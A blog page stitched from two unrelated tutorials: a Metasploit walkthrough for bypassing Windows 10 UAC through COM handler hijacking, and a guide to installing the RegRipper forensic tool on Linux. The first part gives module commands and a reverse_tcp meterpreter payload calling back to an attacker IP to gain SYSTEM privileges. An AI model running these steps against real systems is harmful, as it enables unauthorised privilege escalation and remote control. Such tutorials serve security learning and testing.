Tuesday, August 22, 2017

Bypass UAC in Windows 10 using bypass_comhijack Exploit

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.
Let’s start!!
 Attacker: Kali Linux
Target: window 10
Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.
getuid
getprivs
 From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.
To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.
Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:
usr>share>metasploit_framework>modules>exploit>windows>local
 From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.
This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.
use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit
From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.
getsystem
getprivs
 Wonderful!! Attacker got system/admin authorities and privileges.
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to install RegRipper registry data extraction tool on Linux


RegRipper is an open source forensic software used as a Windows Registry data extraction command line or GUI tool. It is written in Perl and this article will describe RegRipper command line tool installation on the Linux systems such as Debian, Ubuntu, Fedora, Centos or Redhat. For the most part, the installation process of command line tool RegRipper is OS agnostic except the part where we deal with installation pre-requisites.

https://linuxconfig.org/how-to-install-regripper-registry-data-extraction-tool-on-linux

https://github.com/keydet89/RegRipper2.8

Pre-requisites

Fist we need to install all prerequisites. Choose a relevant command below based on the Linux distribution you are running:
DEBIAN/UBUNTU
# apt-get install cpanminus make unzip wget
FEDORA
# dnf install perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which
CENTOS/REDHAT
# yum install  perl-App-cpanminus.noarch make unzip wget perl-Archive-Extract-gz-gzip.noarch which

Installation of required libraries

The RegRipper command line tool depends on perl Parse::Win32Registry library. The following commands will take care of this pre-requisite and install this library into /usr/local/lib/rip-lib directory:
# mkdir /usr/local/lib/rip-lib
#  cpanm -l /usr/local/lib/rip-lib Parse::Win32Registry

RegRipper script installation

At this stage we are ready to install rip.pl script. The script is intended to run on MS Windows systems and as a result we need to make some small modifications. We will also include a path to the above installed Parse::Win32Registry library. Download RegRipper source code from https://regripper.googlecode.com/files/. Current version is 2.8:
#  wget -q https://regripper.googlecode.com/files/rrv2.8.zip
Extract rip.pl script:
# unzip -q rrv2.8.zip rip.pl 
Remove interpretor line and unwanted DOS new line character ^M:
 
# tail -n +2 rip.pl > rip
# perl -pi -e 'tr[\r][]d' rip
Modify script to include an interpretor relevant to your Linux system and also include library path to Parse::Win32Registry:
# sed -i "1i #!`which perl`" rip
# sed -i '2i use lib qw(/usr/local/lib/rip-lib/lib/perl5/);' rip
Install your RegRipper rip script and make it executable:
# cp rip /usr/local/bin
# chmod +x /usr/local/bin/rip

RegRipper Plugins installation

Lastly, we need to install RegRipper's Plugins.
# wget -q https://regripper.googlecode.com/files/plugins20130429.zip
# mkdir /usr/local/bin/plugins 
# unzip -q plugins20130429.zip -d /usr/local/bin/plugins
RegRipper registry data extraction tool is now installed on your system and available via rip command:
# rip
Rip v.2.8 - CLI RegRipper tool
Rip [-r Reg hive file] [-f plugin file] [-p plugin module] [-l] [-h]
Parse Windows Registry files, using either a single module, or a plugins file.

  -r Reg hive file...Registry hive file to parse
  -g ................Guess the hive file (experimental)
  -f [profile].......use the plugin file (default: plugins\plugins)
  -p plugin module...use only this module
  -l ................list all plugins
  -c ................Output list in CSV format (use with -l)
  -s system name.....Server name (TLN support)
  -u username........User name (TLN support)
  -h.................Help (print this information)
  
Ex: C:\>rip -r c:\case\system -f system
    C:\>rip -r c:\case\ntuser.dat -p userassist
    C:\>rip -l -c

All output goes to STDOUT; use redirection (ie, > or >>) to output to a file.
  
copyright 2013 Quantum Analytics Research, LLC

RegRipper command examples

Few examples using RegRipper and NTUSER.DAT registry hive file. 

List all available plugins:

$ rip -l -c
List software installed by the user:
$ rip -p listsoft -r NTUSER.DAT
Launching listsoft v.20080324
listsoft v.20080324
(NTUSER.DAT) Lists contents of user's Software key

listsoft v.20080324
List the contents of the Software key in the NTUSER.DAT hive
file, in order by LastWrite time.

Mon Dec 14 06:06:41 2015Z       Google
Mon Dec 14 05:54:33 2015Z       Microsoft
Sun Dec 29 16:44:47 2013Z       Bitstream
Sun Dec 29 16:33:11 2013Z       Adobe
Sun Dec 29 12:56:03 2013Z       Corel
Thu Dec 12 07:34:40 2013Z       Clients
Thu Dec 12 07:34:40 2013Z       Mozilla
Thu Dec 12 07:30:08 2013Z       MozillaPlugins
Thu Dec 12 07:22:34 2013Z       AppDataLow
Thu Dec 12 07:22:34 2013Z       Wow6432Node
Thu Dec 12 07:22:32 2013Z       Policies
Extract all available information using all plugins and save it to case1.txt. file:
$ for i in $( rip -l -c | grep NTUSER.DAT | cut -d , -f1 ); do rip -p $i -r NTUSER.DAT &>> case1.txt ; do

Man in the Rain